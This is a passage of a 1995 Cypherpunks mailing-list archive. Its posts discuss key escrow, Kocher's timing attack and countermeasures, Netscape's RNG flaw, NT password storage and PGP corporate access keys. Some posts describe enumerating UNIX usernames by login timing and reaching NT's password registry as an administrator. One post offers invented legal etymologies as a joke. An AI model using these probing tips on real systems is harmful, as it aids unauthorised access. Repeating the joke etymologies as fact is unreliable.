e masses.  the undertaking of building such a network from scratch is 
astronomical.  however, if one wwas to use the orientation symbols in ones 
messages, as if they were being beamed, but in an email message instead, one 
could make use of the simple key, and the simple game of '20 questions' to 
generate a totally secure key in a mater of minutes, depending on how long the 
message was and therefore how long the key has to be.  Does any of this make 
sense?

Regards, 
Munster.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 12 Dec 1995 05:59:37 +0800
To: froomkin@law.miami.edu
Subject: Re: NIST GAK export meeting, sv
In-Reply-To: <199512110001.QAA02413@comsec.com>
Message-ID: <9512111605.AA10870@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>CRYPTO: Does anyone recall the cite for a paper a few years that set out a
>way to have escrow agents who would be "oblivious" to the identity of the
>subject of the warrant?  And how would such an escrow agent be sure that
>they were not being duped by the feds? 

AFAIK, Clipper and most of the other systems had escrow agents oblivious to
the identity of the subject of the warrant.  I have seen *no* system which
allows an escrow agent to know it's not being duped by the feds and I
believe I know how to prove that that's not possible.

If you see any such system, please let me know.

BTW, there was Silvio Micali's design which allowed the escrow agents to
verify that they were given the right private key shares without anyone
learning the private key in the process.  That's the only oblivious
mechanism I recall in this business.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 12 Dec 1995 04:42:24 +0800
To: cypherpunks@toad.com
Subject: Timing attacks
Message-ID: <95Dec11.111045edt.4478@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have had some success using timing against UNIX to find out what usernames
are valid on systems with finger &c disabled.  If a username does not exist,
it returns the "Login incorrect" a lot faster than it would if the username
existed but the password was incorrect.  I wonder how many other systems are
vulnerable to this sort of attack.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Dec 1995 05:12:18 +0800
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
In-Reply-To: <v02130504acf0c75190a9@[199.125.128.5]>
Message-ID: <9512111614.AA12454@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>So, is this what happened at Crypto AG? Is this what happened at
>Netscape? We may never no for certain, but there is a final
>warning for the folks at Netscape that is buried the Sun's
>article about Crypto AG:

No it is nothing like what happened at Netscape which was a common or
garden cock up. It was simply the result of miscommunication between
two groups of people being the original and new security team. Taher
et al thought that the random number seed was OK because they discovered 
a design document describing it. Unfortunately the code had not been 
written to implement that design.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 12 Dec 1995 05:54:54 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...)
In-Reply-To: <199512090815.DAA08976@opine.cs.umass.edu>
Message-ID: <30CC1859.7C84@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Futplex wrote:
> someone quoted:
> Microsoft Knowledge Base article Q102716 says:
> > Storage of the Passwords in the SAM Database
> [...]
> > The second encryption is decryptable by anyone who has access to the
> > double-encrypted password, the user's RID, and the algorithm. The second
> > encryption is used for obfuscation purposes.
> 
> Anyone feel like putting together some sample plaintext/ciphertext pairs ?

This will be really difficult, and in practice rather pointless.  NT does
not allow any user, priviliged or not, to gain access to any form (encrypted
or not) of the passwords.  They are stored in a protected area of the system
registry that only the OS itself can access.  The best that you can do is
to ask the OS whether a given username/password pair is valid or not, and it
took until version 3.51 before MS let you do even that!

Of course, rebooting the PC and inspecting the disk with another OS is not
an answer since in any decent environment you will not be able to march up
to the server with a floppy and hit the reset button!


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 12 Dec 1995 01:04:45 +0800
Subject: No Subject
Message-ID: <QQztrg26462.199512111704@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


A few years back i ran thru a paper emanating
from a navy labs researcher (i think the name was Peccora)
about using synchronised chaotic signal generators as a
signal scrambling/encrytpion scheme.

Has there been any kind of progress in this line of work,
practical applications ?

Answer on C4i-pro or directly email to Denholl@ceram.fr

L. Den-Hollander. OIT engineer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 12 Dec 1995 05:33:54 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: No Subject
Message-ID: <9511118187.AA818709467@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     
     Is the Cafe e-cash system different than Mondex? If so, how?
     Also, does anyone know when the Mondex trial will start in Delaware?
     
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy
     
     David Klur 
     dklur@dttus.com
     
     I am who I am because I say so.  So there. 
     -----END PBP SIGNATURE-------
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 12 Dec 1995 14:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <199512112049.MAA26431@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I for one will probably add a flag for conditional compilation of my
> > bignumber library so that it will take constant time.  This may be a
> > %10 slow down (using small windows exponentiation) which is trivial
> > compared to the %30 speedup I will probably get when I implement a
> > faster mod function :-).
> 
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

No, he's saying to equalize wall-clock time---just pad out beyond the
largest possible execution time with a timer.  Surely with a sufficient
pad the timing-channel leak can be made negligible (though the author
seems to claim otherwise---I should read the explanation!).

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 12 Dec 1995 05:45:55 +0800
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
Message-ID: <v02130504acf220191b61@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 AM 12/11/95, hallam@w3.org wrote:

>>So, is this what happened at Crypto AG? Is this what happened at
>>Netscape? We may never no for certain, but there is a final
>>warning for the folks at Netscape that is buried the Sun's
>>article about Crypto AG:
>
>No it is nothing like what happened at Netscape which was a common or
>garden cock up. It was simply the result of miscommunication between
>two groups of people being the original and new security team. Taher
>et al thought that the random number seed was OK because they discovered
>a design document describing it. Unfortunately the code had not been
>written to implement that design.
>
>        Phill

Thanks for the deeper insight. Sure it was probably a mistake. But someone
made the decision to write code that didn't conform to that design document.
That person was probably saying, "Random number generator. Cool. I can use
the standard C library." or whatever. But that person could have been saying,
"Hey, if I slip this in then I'll be able to snag the session
keys with impunity."
We'll never know for sure.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 12 Dec 1995 14:01:08 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com>
Message-ID: <30CC9B8C.6201@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> The trivial way to handle this is simply to check user time with the
> right system calls and make sure it always comes out the same with an
> apropriate number of sleeps.

The problem with that approach is that if the system is heavily loaded,
it can take an arbitrarily large amount of user time.  Somewhat better
is to sleep for a random amount of time after you're done.  That will
smear out the time distribution making it harder to get a statistically
meaningful number of samples.  It also increases your latency, but
doesn't hurt throughput on a busy system.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Dec 1995 14:13:08 +0800
To: pfarrell@netcom.com (Pat Farrell)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tPFLA-0008xoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/10/95 -0800, you wrote:
>
>NIST Key Export meeting, December 5, 1995 Long version 
>Part 3 of 3.
>
>This covers the notes on agent criteria, and the 
>industry presentations. 
>
[stuff deleted]
>
>Geoff said that they may want legislation support for 
>protecting against illegal release of keys, failure to release, etc.

Pardon me, but since this "key escrow" system was always claimed to be
"voluntary," then how can there be any kind of legal penalties associated
with "failure to release" those keys?


Which raises another question:  Let's suppose I owned a product based on
CKE, and I went to the escrow agent and said, "This escrow is voluntary,
right?  If so, erase my key in your possession."

Not that I'd trust them to do so, but how "voluntary" can a system be if
people can't volunteer out of it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 12 Dec 1995 15:05:35 +0800
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <Ikn1ZhGMc50eA2iscn@nsb.fv.com>
Message-ID: <199512112006.NAA15060@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity known as "Tense Hot Alien in Barn" wrote:
>
> This is exactly right.  In fact, it isn't even just bad programmer
> decisions; some of the complexity is really inherently needed for
> security.  PGP's notion of who you trust to certify keys, for example,
> confuses the heck out of naive users, who want to "trust" anyone they
> believe is a good person, not just people they believe are sophisticated
> enough to sign keys.  It's really hard to explain to some people why
> they should say, "No, I don't trust Grandma."
> 
> What a lot of people don't seem to realize is that, in crypto software,
  ***********************************************************************

> there is a fundamental tradeoff between usability and security.  You can
  ***************************************************************

> simplify PGP (or similar software) to the point where it's easy to deal
> with key management, but it will then be far more susceptible to
> compromise.


I'm glad that you are willing to state this opinion,
Nathaniel, and take the flack that you are taking.  I think
that as the goals of cypherpunkism (ewww... I just invented a
new "ism"...) *really* pertain to the *use* of cryptography by
large groups of people-- and not merely to the mathematical
details of cryptography-- that this issue is going to become
overwhelmingly important in the very near future.


I challenge you, however, to go beyond pointing this problem
out and start suggesting some approaches to alleviating it.
With your experience in doing security for a successful 
Internet transaction system, I would hope that you have 
valuable insights which can benefit all of us.


To get to the point, I want to know if this "fundamental 
tradeoff" that you refer to is in fact *fundamental*.  That is
to say: is the product of the "security factor" and the
"usability factor" a constant?  Or are there methods which can
be practically implemented to make strong cryptography easier
for Joe Average to use without exposing Joe to unnecessary
risks?


I'm sure in a trivial sense that there are some such methods.  
For example (to pick on everyone's favorite 
crypto-for-the-masses), if PGP v1 and v2 had come in a nice
menu-oriented shell, or with a nice API, then a hell of a lot
more people would be using PGP now, and without reducing its
effectiveness as far as I can see.  I'm sure that the PGP
guys are aware of this problem, and I am looking forward (as
I'm sure many of us are) to PGP v3 with much anticipation.


But this kind of gooey "user friendliness" is not sufficient 
to make crypto *really* convenient to learn and to use, nor 
is it sufficient to make Joe Average's use of crypto really 
secure.  (Note the extreme sparsity of the current PGP Web O 
Trust, and the oft-lamented weakness of Joe's passphrase.)


I have made a clumsy first shot at envisioning the kind of
strong, convenient crypto that could perhaps bring the 
capabilities that we talk about here to the masses.  
I submitted this article to cpunks last week entitled "My
conception of the ideal encryption tool for the masses", and 
it was picked up Robert Hettinga and echoed to his e$pam list.  
Unfortunately I have not received a single response to this 
article either in personal mail or in public.  Was my article 
so poorly written?  Or are the cpunks failing to realize the 
importance of the usability/security issue?


I sincerely hope that Nathaniel and others can make progress
in addressing this issue.  Ultimately it will be as important 
as any issue in cryptography.


Regards,

Bryce

P.S.  I just went and re-read "My conception of the ideal
encryption tool for the masses" and I think I failed to make
something clear.  The crypto device that I envision is *not*
just useful for buying a pack of cigarettes at the grocery
store.  I could imagine it being used for *every*
user-authentication purpose.  You sit down at a terminal, plug
your pocket-crypto-box into it, and read your private e-mail.  
You walk into a secure building, pass your pocket-crypto-box 
in front of the infra-red IO device, and the door opens for
you.  You negotiate a million-cyber-credit deal, you plug
your pocket-c'box into the Net, and sign the contract.
Etc. etc.  In short, for the vast majority of your crypto
needs you depend *entirely* upon the pocket-c'box and not upon
passphrases and floppy disks.


P.P.S.  I am aware that this makes a physical attack upon your 
c'box into one of the few remaining viable attacks.  
I recommend that everyone carries a handgun next to their 
pocket c'box.  Deadman switches, good police forces and other
physical security, etc. will also be important.  Since this
technology is empowering individuals, it is also increasing 
the value of loot than can be gained by robbing an individual.
Alley-bash the right person and you might be able to steal a
personal fortune.  Another issue that we who seek a better
future through technology need to address.


P.P.P.S.  I can see that there is a major problem with my idea 
regarding the IO between the pocket-c'box and the user.  
Perhaps the pocket-c'box will have to come with trusted IO 
hardware (screen, keyboard, pointer-device, audio, 
vox-recog...  but I digress...).


P.P.P.P.S.  Also note that the pocket c'box should probably 
hold many of your pseudonyms (i.e., many of your pseudonyms' 
private keys) and your Chaumian pseudonym-exchangeable 
credentials.


P.P.P.P.P.S.  Remember those under-$600.00 netstations?  
Even if they don't pan out this year, they will soon.  And 
then they will move into our pockets, and into our 
wristwatches, etc etc.  The cypherpunks need to be ready to 
offer Joe a *secure* computer to put into his pocket, so 
that he is carrying new capabilities and renewed privacy in 
his pocket, rather than carrying a little chunk of Big 
Brother.



signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMyPLfWZSllhfG25AQHPRQP/fwhKqyUdOv2/t/YCc68GQrNMOhCT69KE
PVE27Fp3CYnx+lGgzynnh1kr9DlH/bOOQRGf+fjqbPswr7PDHUoMaTAnBFr8gzf3
eXPd9moyixjNvHXacMpl0I5A/0tr6Lt2N/L5FUTyMf5zecMzbEbuKyiQE8pOYajx
COKJyTTk794=
=4spo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <khijol!netcom.com!ecarp@cygnus.com>
Date: Tue, 12 Dec 1995 14:27:46 +0800
To: khijol!ix.netcom.com!stewarts@cygnus.com
Subject: Re: [NOISE] GAK and self-incrimination?
Message-ID: <199512112018.OAA11102@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 09:01:40 -0500
> To:            Bill Stewart <stewarts@ix.netcom.com>
> Subject:       Re: [NOISE] GAK and self-incrimination?
> From:          tallpaul@pipeline.com (tallpaul)
> Cc:            cypherpunks@toad.com

> If I'm not guilty why do I want strong crypto? Sometimes for the same
> reason I want a shredder.  And why do I want a shredder? Sometimes just to
> keep the local gossip from going through my papers after I throw them out. 

Another, not-so-obvious reason to encrypt stuff, especially stuff 
that goes out over the net, is that folks can suck your email off the 
net and gather all sorts of useful information.  This has all kinds 
of annoying implications, especially for people who gather 
demographics and other data for constructing email lists for sale.

-- short ed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 06:50:11 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <199512111810.NAA02186@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> I just read this paper, and while it is somewhat interesting, I
> don't think the walls of cryptography are in any danger of
> crumbling.
> 
> People employing systems like PGP are already advised to use them
> on private machines, with only one user, and untampered-with
> binaries.

Timings like the ones listed are trivial to take in establishing
things like SSL sessions, or Photuris sessions. The danger is to
online protocols, not to PGP.

Any reason you felt you had to say this anonymously?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 06:50:02 +0800
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.SOL.3.91.951211192419.28608P-100000@orb>
Message-ID: <199512111813.NAA02194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> Read the SKIP spec (SKIP is Sun's IP level encryption protocol).  It uses
> Diffle-Hellman certificates.

Photuris, which likely will be the standard way to do this sort of
thing on top of IPsec, also suffers from the problem, but I suspect
the next version of the draft (number 9) will have it fixed.

More interesting is the fact that a number of NSA vetted protocols
seem to have the flaw. Obviously, they either didn't know or didn't
say anything about it to the folks designing such stuff...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 05:31:37 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <199512111815.NAA02202@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> > I for one will probably add a flag for conditional compilation of my
> > bignumber library so that it will take constant time.  This may be a
> > %10 slow down (using small windows exponentiation) which is trivial
> > compared to the %30 speedup I will probably get when I implement a
> > faster mod function :-).
> 
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

The trivial way to handle this is simply to check user time with the
right system calls and make sure it always comes out the same with an
apropriate number of sleeps.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Tue, 12 Dec 1995 06:59:25 +0800
To: cypherpunks@toad.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...)
Message-ID: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 12/11/95 +0000, you wrote:
>Futplex wrote:
>> someone quoted:
>> Microsoft Knowledge Base article Q102716 says:
>> > Storage of the Passwords in the SAM Database
>> [...]
>> > The second encryption is decryptable by anyone who has access to the
>> > double-encrypted password, the user's RID, and the algorithm. The second
>> > encryption is used for obfuscation purposes.
>> 
>> Anyone feel like putting together some sample plaintext/ciphertext pairs ?
>
>This will be really difficult, and in practice rather pointless.  NT does
>not allow any user, priviliged or not, to gain access to any form (encrypted
>or not) of the passwords.  They are stored in a protected area of the system
>registry that only the OS itself can access.  The best that you can do is
>to ask the OS whether a given username/password pair is valid or not, and it
>took until version 3.51 before MS let you do even that!
I took a quick look in my NT registry and you can get access to the Account
Manager section of the registry by manually changing the permissions and
giving yourself access.  I didn't have the time to look at all of the
entries in the registry, but there's a lot of stuff there and I wouldn't be
suprised if the encryted passwords were available.  Of course, you have to
be an administrator to change the permissions, but it is possible.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 12 Dec 1995 07:02:56 +0800
To: perry@piermont.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com>
Message-ID: <199512111906.OAA01139@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>The trivial way to handle this is simply to check user time with the
>right system calls and make sure it always comes out the same with an
>apropriate number of sleeps.

Of course, this works against a remote adversary, but not against one
on the same machine who can look at actual CPU consumption (which doesn't
increase when the target is blocked).

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 12 Dec 1995 06:14:36 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Timing Attacks
Message-ID: <Pine.A32.3.91.951211141205.26486F-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm not so sure I see the great usefulness of this attack.

I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
comes down to essentially, if I undestand it correctly, is that you need 
to be as sure of the timing as you can be.

Now, on a distributed system, you can't measure those timings, because 
any latency  could come from the originating computer, the links in the 
middle or any combination of them.

Also precise timings can be limited by fluctuating load averages amongst 
other things in a time-sharing computing environment.  While this might 
work in a lab, with the current advances in computing speed, the 
differences between a fast and a slow calculation can easily be opaqued 
by network lag.

Am I missing something, or does this attack only work in a lab?


Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 12 Dec 1995 14:50:02 +0800
To: cman@communities.com (Douglas Barnes)
Subject: In pursuit of the perfect frisbie (was NSA flying disk...)
In-Reply-To: <v02120d07acee50acb4f2@[199.2.22.120]>
Message-ID: <9512112033.AA00608@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
 <..snip..>
> obtaining one of these fine flying disks.
> (http://www.communities.com/foo/NSAfris.gif)
> 
> If you'd care to discuss this matter with Mr. Cisco yourself,
> he can be reached at: (301) 688 0701. Note that this is in
> Maryland. Also, the (301) 688 0606 number listed on the frisbee
> seems to be either always busy or not answered -- I'm assuming
> it's the # for the NSA tech transfer office.
> 

I also tried the public affairs department of the National Security
Agency at (301) 688-6524, with no luck.  They gave me the number of
the technology transfer office.  From then on out it was nothing but
busy signals.  (I guess there are many c'punks hammering them with 
phone calls...)

> Please let me know if any of you have better luck.
> 

I spoke with Mr. Cisco for several minutes, but he stated that the
NSA would not be at any trade shows in the Southern United States
any time soon.  He did state that they would be in Salt Lake, sometime
in the near future.

In a fit of dispair, I called the local branch office of the Central
Intelligence Agency only to get an answering machine, in an attempt to
get the number for public affairs office.  (Maybe they have a cool
flying disk...)  I called the direct number for the Central 
Intelligence Agency and was grudingly transferred to the public affairs 
office.  I was then given the number to the store that sells CIA stuff
at (703) 821-1414. 

[sigh] They don't have frisbies, but they do have the official CIA
shot glasses...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Tue, 12 Dec 1995 14:04:33 +0800
To: "'cypherpunks@toad.com>
Subject: ViaCrypt supports CKE in PGP
Message-ID: <c=US%a=_%p=INTERGRAPH%l=EXCH7951211144556JT00FA05@exch11>
MIME-Version: 1.0
Content-Type: text/plain


In today's mailbox I got a pack of marketing slicks from ViaCrypt. They're 
about to release ViaCrypt PGP 4.0 in two editions: Personal and Business. 
The 4.0 release adds some nice new features:
	- recipient groups for sending to several addresses at once
	- a Search dialog for finding keys
	- encryption-only & decryption-only keys
	- signature-only keys
	- key expiration dates
	- a Windows DLL that third-party developers can use (!!)

The biggie, though, are these:

	"Encryption automatically includes Corporate Access Key as additional 
recipient (option)"

and
	"Key selection/display dialogs show only keys certified by Corporate 
Access Key (option)"

So, real CKE will soon be available from an unexpected source. I'm not sure 
whether to be excited or dismayed. On the one hand, any movement towards 
CKE seems dangerously close to the slippery slope of GAK. On the other 
hand, I know a large corp like Intergraph is much more likely to license 
PGP for internal use if it has CKE features-- especially since they can 
hold the keys internally. The DLL is an awfully nice feature, too.

-Paul
--
Paul Robichaux, KD4JZG | perobich@ingr.com
Intergraph Corporation   | http://www.intergraph.com
Be a cryptography user.  | Not speaking for Intergraph
Co-author, "Building Internet Appls With Visual C++", Que Books 
(0-7897-0213-4)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Dec 1995 14:22:30 +0800
To: cypherpunks@toad.com
Subject: The origin of some heavy legal terms
Message-ID: <acf1e23a04021004fdea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 PM 12/11/95, Black Unicorn wrote:

>The term 'pressing a defendant for a plea' came from the practice of
>piling heavy weights on a defendant and 'pressing' him into the very
>floor of the court. (As defendants who did not admit a plea would save
>their family from being held accountable to judgment, the incentive to
>remain silent was high).  Often weight was piled atop the hapless
>defendant until he or she expired, having refused to enter a plea.

Modern courts have replaced the rocks used in earlier days with law books,
of course. The need for heavy law books to press the accused is one of the
main reasons electronic versions are not being adopted.

This practice also gave us the term "the full weight of the law" as well as
the symbol of the law as being a blind woman carrying a scale filled with
rocks to place upon the guilty to convince them to confess. (This was
originally done in the court's torture chamber, from which we get the term
"judge's chamber.")

Sometimes the "scales of justice" can be "tipped," which derives from the
practice of tipping the judge to get favorable rulings.

--Tim "Not a Lawyer" May







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 12 Dec 1995 11:39:15 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112125.QAA07753@homeport.org>
Message-ID: <30CCBA28.24F8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> 
> Jeff Weinstein wrote:
> 
> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> | out his wallet and handed him 10 crisp $100 bills.  :-)
> 
> Great.  mention it where the IRS is sure to be listening.  :)

  I know the spooks hang out here, but I didn't think the IRS
did.  Maybe the NSA just forwards them all net traffic that
includes the words cash, bills, etc.  :-)

  Since Paul mentioned it on his web page, and it was also
in a press release, I figured it was OK.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Tue, 12 Dec 1995 11:02:53 +0800
To: SBinkley@atitech.ca (Scott Binkley)
Subject: [NOISE] Re: Pornographic stories
In-Reply-To: <8043943A02502C79@-SMF->
Message-ID: <199512112333.PAA12799@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Scott Binkley writes:
 > Stop posting this type of crap on the Internet.

     I'd be pleased if people would refrain from posting to
inappropriate groups.  There a number of acceptable venues for
pornography on the Net.

 > People like you are the ones to get everyone censored.

     If we censor ourselves, the bluenoses win.

 > Hopefully everyone else will flame you a thousand times over

     A polite note suggesting that one remember to log out when
leaving one's terminal unattended should suffice.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMy/qu5Yg08fDKehAQG8nAQAlJZjWwGPfkCgM3+umOFlfNd0wYZBCKiw
M3JktEPpBpviMmiiH6WgKI0BHpvWhLmEcwVQ7Bs56pRtLma/gp66ljOC+eP2m78f
KxN8Ao9o/MDDdX7LHUHC7IeliMikBcdkCBttrHdKXpY6xTFAygwVH2qC+rmam0Xp
Gz0USqvzDc0=
=2V4I
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 1995 14:58:46 +0800
To: cypherpunks@toad.com
Subject: Third generation privacy
Message-ID: <199512112050.PAA12912@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp@netcom.com)" 
<khijol!netcom.com!ecarp>' wrote:  
  
  
>  
>Another, not-so-obvious reason to encrypt stuff, especially stuff   
>that goes out over the net, is that folks can suck your email off the   
>net and gather all sorts of useful information.  This has all kinds   
>of annoying implications, especially for people who gather   
>demographics and other data for constructing email lists for sale.  
>  
>-- short ed  
>  
  
Another related issue is what I'll call "third generation" privacy. This 
exists when I want privacy not for myself or even the person with whom I'm 
communicating but to protect the privacy of innocent third parties. E.g.:  
  
Grandpa is getting senile and I'm communicating with a second family member

on how we should handle the problem;  
  
My friend Jane was just raped and I'm communicating with a mutual friend 
about how we can help her.  
  
The anti-freedom forces have tried to define the parameters of the debate 
inside the boundaries of the "four horsemen." We need to understand that we

do not have to remain within those false boundaries and, in fact, it is 
very good not to.  
  
--tallpaul  
      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 13:44:35 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: Timing Attacks
Message-ID: <199512120026.QAA19309@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 PM 12/11/95 -0500, "Rev. Ben" <samman-ben@CS.YALE.EDU> wrote:
>I'm not so sure I see the great usefulness of this attack.
>
>I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
>comes down to essentially, if I undestand it correctly, is that you need 
